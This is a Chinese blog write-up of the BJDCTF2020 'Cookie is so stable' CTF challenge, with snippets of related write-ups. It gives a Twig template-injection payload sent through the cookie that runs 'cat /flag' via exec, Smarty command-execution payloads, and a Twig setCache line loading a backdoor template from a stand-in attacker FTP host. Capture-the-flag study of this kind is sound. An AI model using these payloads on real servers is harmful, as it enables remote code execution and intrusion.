[BJDCTF2020]Cookie is so stable 1(twig模板注入)

最新推荐文章于 2024-06-13 07:36:50 发布
最新推荐文章于 2024-06-13 07:36:50 发布
阅读量428 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45577185/article/details/120147690
本文深入探讨了在BJDCTF2020比赛中遇到的一个Cookie中的Twig模板注入漏洞。通过分析包内容,作者发现了两个不同之处,并确认存在SSTI注入。尽管在页面上直接操作无法获取Flag,但通过测试构造了Payload,揭示了过滤机制的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

详解模板注入漏洞
关于SSTI注入的一些理解
抓个包:
请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述
发现了两个包在cookie上的不同
判断是twig,经过测试发现是ssti注入
Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
请添加图片描述
注释:如果不抓包在页面是无法获得flag的,应该有过滤
在这里插入图片描述

最低0.47元/天 解锁文章
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 2089
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3913
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
[BJDCTF2020]Cookie is so stable1
最新发布
m0_73673698的博客
06-13 793
如果是Jinja2的话输出应该是输出22,为什么输出22呢,'2'在python中被看作是字符串,在python中一个字符串乘上一个数字,就是将这个字符串连续输出,看下面演示。这里是Twig1.x版本(但是怎么确定是1.x版本的我没有弄明白,因此下面的payload也只适用于Twig1.x版本)最终我们的payload为。提示看一下cookie,我们在flag.php页面抓包可以看到cookie中是存在一个user参数的。确定是ssti注入,那么接下来就是确定是哪个模板了,上图。打开题目,看到如下页面。
[WP/SSTI/PHP_Twig]Cookie is so stable解题/Twig模板注入
車鈊的博客
07-23 737
[BJDCTF2020]Cookie is so stable PHP-Twig模板注入 参考了知乎大佬的文章:https://zhuanlan.zhihu.com/p/28823933 通过_self我们可以调用环境变量中的env属性,当PHP打开远程加载文件的参数(allow_url_include)时,问我们可以通过它来实现远程文件包含 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor
Twing模板注入 [BJDCTF2020]Cookie is so stable1
m0_75178803的博客
02-28 628
打开题目我们先抓包分析一下可以输入{{7*7}}处发包试一下可以看到在cookie处存在ssti模板注入输入{{7*‘7’}},返回49表示是 Twig 模块输入{{7*‘7’}},返回7777777表示是模块在这里可以看出是Twing模块我们直接用固定payload就可以得到flag。
[BJDCTF2020]Cookie is so stable 1
plant1234的博客
05-28 467
[BJDCTF2020]Cookie is so stable 1 首先打开题目发现是一个登陆框: 经过测试发现有ssti注入: 然后是检测ssti注入类型: 模板注入漏洞: 可以参考: 一篇文章带你理解漏洞之SSTI漏洞 在测试一下{{7*‘7’}} 发现是: 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 所以判断是Twig 根据提示是cookie,于是登陆后抓个包得到: 在cookie的user处有注入 应为确定
[BJDCTF2020]Cookie is so stable
热门推荐
qq_74806534的博客
02-17 1万+
输入user={{7*'7'}}测试一下,确实存在(注意cookie的user前面的连接是;先发现有flag页面和Hint页面,dirsearch扫完也没有获得什么。输入{{7*‘7’}},返回7777777表示是 Jinja2 模块。输入{{7*‘7’}},返回49表示是 Twig 模块。题目提到cookie,抓包看看。同时也判断了ssti注入的类型。同样的方法,在cookie输入。所以是有固定的payload。falg输入什么就返回什么。模板注入Twig注入
【学习笔记 42】 buu [BJDCTF2020]Cookie is so stable
weixin_43553654的博客
08-02 433
0x00 知识点 Twig模板注入 0x01 知识点详解 什么是Twig模板注入? 答:这里推荐一位大佬的文章,看看人家的博客,才是真的强。 https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig 0x02 解题思路 什么都没有,点开flag 发现是个登录界面,尝试经典{{7*7}}后判断是Twig模板注入 再hint页面查看源码 发现提示指向了cookie,再flag页面登录的时候抓包分析。 推测出cookie里的user参数就是
CTF笔记 SSTI模板注入
qq_51248658的博客
10-21 1077
这次只是简单的把以前写的题目进行了总结,大致明白了解题步骤,但还是得多积累一些payload,以及绕waf的方法。这个可以去找sstilab通关相关内容进行学习,感觉那上面挺全的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值